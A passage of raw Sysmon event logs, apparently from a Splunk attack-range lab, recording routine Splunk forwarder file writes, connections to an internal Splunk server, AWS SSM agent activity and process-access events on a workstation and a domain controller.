Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=968E039D794342A34D3A5322157B9C12,SHA256=2B04F90F2777AFA17AE2CA4E563EDA38A6DDC9EA702E699660879F7E5595053F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:35.556{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51691-false10.0.1.12-8000- 23542300x8000000000000000222014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:37.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1356D94EEEFDCAF702A319E5DB9657C5,SHA256=0D67757B6B58675100930BEEAB4CC22D409EA8348402F87CD3F94385CDC1D93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:38.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CCCAA4305E523148D8B1C931015053,SHA256=9403E0FD5A5CF0A21C5D081AA84372E29EF6BB83F979CB13BA5F6D5259626067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:38.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D497454347C65B21A3A95954FFA5C882,SHA256=EB17F01A48E700CBDEF74FB61FED2E3FB560646FF8011BAF2271BF5A7FACBE92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:39.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009CDEEFEB61FAE0DF791DB2EA13A415,SHA256=270965EA0C749B641AFA95AAB25BA5569AAA9786C1E0C5FC283F7A59B01BB387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:39.352{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=226285375EDE18B222A72A4277450F4A,SHA256=B4FF99A06A0C895219BA824AC2D8B6DA041C1A8294F1F5F59312A1324C3A2B99,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:37.539{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49512-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:40.572{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65423A25B839A10E8481FC0AA015D20,SHA256=39EE4C38A694621BDD8099443D76A3026306C78460546CE48E71694665B85A21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:40.415{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A31B2B2F1FEEC36AC6583FEB4E09B7,SHA256=44DFB29F0E484C91DECD98A99532912870165B709F639E4CE027F29BCBC52F81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:40.556{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:41.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1F23FB140EEFBA01CAF99BBD4F2610,SHA256=A156F618BFE6335E3F98239E0E2F4AF7193AB3149A92D3142B34087786E397ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:41.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7AF8A212A1F65EA20927F5F1C8E23CA,SHA256=EEE721B281012A6444A955A890243451504E37D21183AC1E2124F0E09E6460DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:40.696{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51692-false10.0.1.12-8000- 23542300x8000000000000000222021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:42.563{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-163MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:42.448{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7962EF176B1FC32425BCA09D857672BA,SHA256=F7CDB9C79FFFAB41E943B447AF90F8B9CCC79683E520FD77E3DD7AB39E5A10DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:42.621{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0838ED95585536A714FCB3096F6E1621,SHA256=AB060A7E6604B6594E0276FF5FFA07DBA349741E53404E74552D50FB8761B988,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:40.006{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49513-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000222024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:43.561{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-164MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:43.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3AC6E358F0F95C19993609ABBEA905E,SHA256=28EC06BF2CB2F9F8F66FE95853CAC84188833711A8CB7C081BB1AC3B351450A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:43.640{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CBFDCBC9D4D666EA249F504505EF6E3,SHA256=8D3B220C33F23C04512A8F944B80DC1444B88546A3DC34B4CE81A54164D0B604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:44.640{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DC67B9C4E89F4F871884D07BFA2886,SHA256=CCC8A6A90E0100818196A1ED1072FC249D7118617AECA6407261F88FA3408A14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.919{4F8D34B0-188C-6216-2C05-000000003902}32283284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-188C-6216-2C05-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-188C-6216-2C05-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.670{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-188C-6216-2C05-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.671{4F8D34B0-188C-6216-2C05-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.466{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764AA3BEAEEBAF1FBF6786F029A1222D,SHA256=810A7BD47DAB1D8330E5353812556378473B2731C2CEBC18BB7811DB53B1EDEE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-188C-6216-2B05-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 